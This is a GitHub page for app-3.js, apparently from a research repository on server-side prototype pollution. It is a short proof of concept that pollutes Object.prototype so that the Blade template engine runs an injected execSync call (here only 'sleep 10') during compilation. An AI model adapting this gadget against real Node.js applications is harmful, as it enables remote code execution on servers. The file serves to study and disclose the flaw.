forked from KTH-LangSec/server-side-prototype-pollution
-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathapp-3.js
25 lines (20 loc) · 760 Bytes
/
app-3.js
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
const blade = require('blade');
const fs = require('fs');
const path = require('path');
// The template will broken but our injected code will be executed
Object.prototype.value = "somevalue"
Object.prototype.output = {
to: "global.process.mainModule.require('child_process').execSync('sleep 10')\nxxx"
}
// This template includes the `render` directive
const mainFilePath = path.join(__dirname, '/views/functions_and_block.blade');
fs.readFile(mainFilePath, 'utf8', (err, mainFile) => {
if (err) throw err;
blade.compile(mainFile, { filename: mainFilePath, debug: true }, (err, tmpl) => {
if (err) throw err;
tmpl({}, function(err, html) {
if (err) throw err;
console.log(html);
});
});
});